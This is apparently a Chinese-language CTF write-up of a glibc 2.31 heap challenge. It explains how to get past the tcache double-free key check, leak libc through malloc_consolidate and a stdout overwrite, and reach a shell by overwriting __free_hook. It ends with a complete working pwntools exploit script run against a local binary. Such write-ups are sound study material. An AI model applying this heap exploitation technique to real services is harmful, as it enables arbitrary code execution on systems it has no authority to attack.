Pwn 知识点总结(2) - libc2.31 & malloc_consolidate 的利用

题目信息

  • libc2.31
题目分析
  • main函数

    • 保护 全开
    • 申请 分配 删除
  • 申请函数

    unsigned __int64 __usercall Malloc@(__int64 a1@)
    {
      const char *v1; // rdi
      unsigned __int64 result; // rax
      unsigned __int64 v3; // rt1
      unsigned int v4; // [rsp-14h] [rbp-14h]
      unsigned __int64 v5; // [rsp-10h] [rbp-10h]
      __int64 v6; // [rsp-8h] [rbp-8h]
    
      __asm { endbr64 }
      v6 = a1;
      v5 = __readfsqword(0x28u);
      Write(1LL, "size >", 6LL);
      Scanf("%ud", &v4);
      if ( v4 == 0x77 || v4 == 0x55 )
      {
        chunk = mallocc(v4);
        Write(1LL, "content >", 9LL);
        v1 = 0LL;
        get_input();
        edit_num = 2;
      }
      else
      {
        v1 = "Do you mean Uzi and Clearlove are inability?";
        print("Do you mean Uzi and Clearlove are inability?");
      }
      v3 = __readfsqword(0x28u);
      result = v3 ^ v5;
      if ( v3 != v5 )
        result = sub_1130(v1);
      return result;
    }
    
  • 编辑函数

    • 只能修改0-0x30处数据,且只能修改两位(对于未free的)
    __int64 __usercall Edit@(__int64 a1@)
    {
      __int64 result; // rax
      unsigned __int64 v2; // rt1
      unsigned int v3; // [rsp-2Ch] [rbp-2Ch]
      __int64 v4; // [rsp-28h] [rbp-28h]
      unsigned __int64 v5; // [rsp-10h] [rbp-10h]
      __int64 v6; // [rsp-8h] [rbp-8h]
    
      __asm { endbr64 }
      v6 = a1;
      v5 = __readfsqword(0x28u);
      if ( edit_num <= 0 )
      {
        print("You have no chance!");
        sub_1190(0LL);
      }
      Write(1LL, "index >", 7LL);
      sub_1150(&v4, 0LL, 8LL);
      Read(0LL, &v4, 8LL);
      v3 = get_num(&v4, &v4);
      if ( v3 > 0x30 )
      {
        print("Wrong index!");
        sub_1190(0LL);
      }
      Write(1LL, "content >", 9LL);
      Read(0LL, chunk + v3, 1LL);
      --edit_num;
      v2 = __readfsqword(0x28u);
      result = v2 ^ v5;
      if ( v2 != v5 )
        result = sub_1130(0LL);
      return result;
    }
    
  • 删除函数

    • 存在 2free 和 UAF
    • 修改此处置为 8
    __int64 __usercall Delete@(__int64 a1@)
    {
      unsigned __int64 v1; // ST08_8
      __int64 result; // rax
      unsigned __int64 v3; // rt1
      __int64 v4; // [rsp-8h] [rbp-8h]
    
      __asm { endbr64 }
      v4 = a1;
      v1 = __readfsqword(0x28u);
      freee(chunk);
      print("Done!");
      edit_num = 8;
      v3 = __readfsqword(0x28u);
      result = v3 ^ v1;
      if ( v3 != v1 )
        result = sub_1130("Done!");
      return result;
    }
    
利用思路
  • 本质就是利用tcache dup
    • 如何泄露libc地址
    • 如何在libc2.31版本绕过tcache的安全检查
2.31版本tcachea安全特性

首先,为了增加安全性,2.29 版本以后的 tcache_entry 结构体发生了变化,增加了 key 字段。其结构体变成了

typedef struct tcache_entry
{
  struct tcache_entry *next;
/* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;
} tcache_entry;

且在 free 的时候多了一段检测

if (__glibc_unlikely (e->key == tcache))
{
    tcache_entry *tmp;
    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
    for (tmp = tcache->entries[tc_idx];
         tmp;
         tmp = tmp->next)
        if (tmp == e)
            malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence.  We've wasted a
few cycles, but don't abort.  */
}

之后在 tcache_put 函数中多了一段 e->key=tcache 的代码:

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
    tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free.  */
    e->key = tcache;

    e->next = tcache->entries[tc_idx];
    tcache->entries[tc_idx] = e;
    ++(tcache->counts[tc_idx]);
}

整个流程为:调用 tcache_put 放入 tcache_entry 的时候,其 next 指针和之前变化一致,但是其 key 字段指向了tcache。接下来 free 的时候会检测 key 字段是否为 tcache,如果相等则检测 free 的指针值是否在对应的tcache_entry 链上,如果在则视为程序在 double free,进而终止程序。这里为什么逻辑不是 key 等于 tcache 直接中断,应该是考虑了用户放在 key 字段的数据恰好为 tcache 值的情况。这种简单的方法使得之前的 tcache 非常随意的 double free 失效了。不过绕过的方式也非常简单,即在构造double free 时提前修改 key 字段的值为任意其他的值。所以相关的所有攻击手法依然可用,并且增加了能够修改key 字段的前提。

利用流程
绕过Tcache key检查
  • 通过edit可以修改特定的位置,因此我们可以修改key绕过tcache的安全检测
    Malloc(0x55, 'yuri')
    Delete()
    Malloc(0x77, 'yuri')
    Delete()

    # tcache[0x60] -> 7
    # fastbin[0x60] -> 1
    Malloc(0x55, 'yuri')
    for _ in range(8):
        Delete()
        Edit(8, '\x00')

tcachebins
0x60 [  7]: 0x55e803dfd2a0 ◂— 0x0
0x80 [  1]: 0x55e803dfd300 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x55e803dfd290 ◂— 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
泄露libc
  • 通过double free 构造处在fastbin上的chunk
  • 由于不能申请更大的堆块,利用缓冲区在堆上,触发malloc_consolidate
    • 使得对应fastbin上的chunk进入small bin
      • smallbin上的fd指向main_arena上的一个地址
  • 通过 1/16 爆破出stdout的地址(exp中泄露的是-0x10偏移处的地址)
    • 主要是修改flag、修改
pwndbg> x /30gx 0x00007fdf38825690
0x7fdf38825690 <_IO_2_1_stderr_+208>:   0x0000000069727579  0x0000000000000000
0x7fdf388256a0 <_IO_2_1_stdout_>:   0x00000000fbad3887  0x00007fdf38825723
0x7fdf388256b0 <_IO_2_1_stdout_+16>:    0x00007fdf38825723  0x00007fdf38825723
0x7fdf388256c0 <_IO_2_1_stdout_+32>:    0x00007fdf38825723  0x00007fdf38825723
0x7fdf388256d0 <_IO_2_1_stdout_+48>:    0x00007fdf38825723  0x00007fdf38825723
0x7fdf388256e0 <_IO_2_1_stdout_+64>:    0x00007fdf38825724  0x0000000000000000
0x7fdf388256f0 <_IO_2_1_stdout_+80>:    0x0000000000000000  0x0000000000000000

复习一下stdout结构体:

pwndbg> p stdout 
$1 = (struct _IO_FILE *) 0x7ffff7dd0760 <_IO_2_1_stdout_>
pwndbg> ptype stdout
type = struct _IO_FILE {
    int _flags;
    char *_IO_read_ptr;
    char *_IO_read_end;
    char *_IO_read_base;
    char *_IO_write_base;  //  本质上是通过修改这个结构题泄露
    char *_IO_write_ptr;   //  这两个指针地址之间的内容
    char *_IO_write_end;
    char *_IO_buf_base;
    char *_IO_buf_end;
    char *_IO_save_base;
    char *_IO_backup_base;
    char *_IO_save_end;
    struct _IO_marker *_markers;
    struct _IO_FILE *_chain;
    int _fileno;
    int _flags2;
    __off_t _old_offset;
    unsigned short _cur_column;
    signed char _vtable_offset;
    char _shortbuf[1];
    _IO_lock_t *_lock;
    __off64_t _offset;
    struct _IO_codecvt *_codecvt;
    struct _IO_wide_data *_wide_data;
    struct _IO_FILE *_freeres_list;
    void *_freeres_buf;
    size_t __pad5;
    int _mode;
    char _unused2[20];
} *
getshell
  • 有了libc地址,以及绕过tcache double free的安全检查

  • 利用tcache dup,修改malloc hook或者free hook即可

EXP
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

#---------------------Setting-----------------------
EXCV = context.binary = './lol'
LIBC = './libc-2.31.so'
elf = ELF(EXCV, checksec=False)
libc = ELF(LIBC, checksec=False)
if args.I:
    context.log_level = 'debug'
if args.D:
    context.terminal = ['tmux', 'split', '-h']
    gdb.attach(proc.pidof(r)[0])
#---------------------Setting-----------------------

def Malloc(size, content):
    r.sendlineafter('>', 'M')
    r.sendlineafter('>', str(size))
    r.sendafter('>', content)

def Delete():
    r.sendlineafter('>', 'D')

def Edit(index, content):
    r.sendlineafter('>', 'E')
    r.sendlineafter('>', str(index))
    r.sendafter('>', content)

def pwn():
    Malloc(0x55, 'yuri')
    Delete()
    Malloc(0x77, 'yuri')
    Delete()

    # tcache[0x60] -> 7
    # fastbin[0x60] -> 1
    Malloc(0x55, 'yuri')
    for _ in range(8):
        Delete()
        Edit(8, '\x00')

    # malloc_consolidate()
    r.sendlineafter('>', 'M')
    r.sendlineafter('>', '7'*0x400)

    # 1/16
    Edit(0, '\x90')
    Edit(1, '\x56')

    Malloc(0x55, 'yuri')
    Malloc(0x55, 'yuri')

    # two byte to leak
    Edit(1+0x10, chr(0x20 | 0x8 | 0x10))
    Edit(0x20+0x10, chr(0))

    data = r.recvuntil("============")[:-len("============")]
    if len(data) <= 0:
        raise Exception('eof')
    base = u64(data[8:16]) - 0x1eb980
    __free_hook_addr = base + libc.symbols['__free_hook']
    system_addr = base + libc.symbols['system']
    # print(hex(base), hex(__free_hook_addr), hex(system_addr))

    # tcache dup
    Malloc(0x77, 'yuri')
    for _ in range(5):
        Delete()
        Edit(8, '\x00')
    Delete()
    for i, ch in enumerate(p64(__free_hook_addr-8)):
        Edit(i, chr(ch))

    Malloc(0x77, 'yuri')
    Malloc(0x77, b'/bin/sh\x00' + p64(system_addr))
    Delete()


if __name__ == "__main__":
    while True:
        try:
            if args.R:
                r = remote('127.0.0.1', 30000)
            else:
                r = process(EXCV)
            pwn()
            break
        except:
            r.close()
    r.interactive()

【参考链接】

  • https://bbs.pediy.com/thread-217970.htm

  • https://github.com/StarCross-Tech/heap_exploit_2.31

  • https://mp.weixin.qq.com/s/9HikpVaV5tpuBtu6hcAt3A

你可能感兴趣的:(Pwn 知识点总结(2) - libc2.31 & malloc_consolidate 的利用)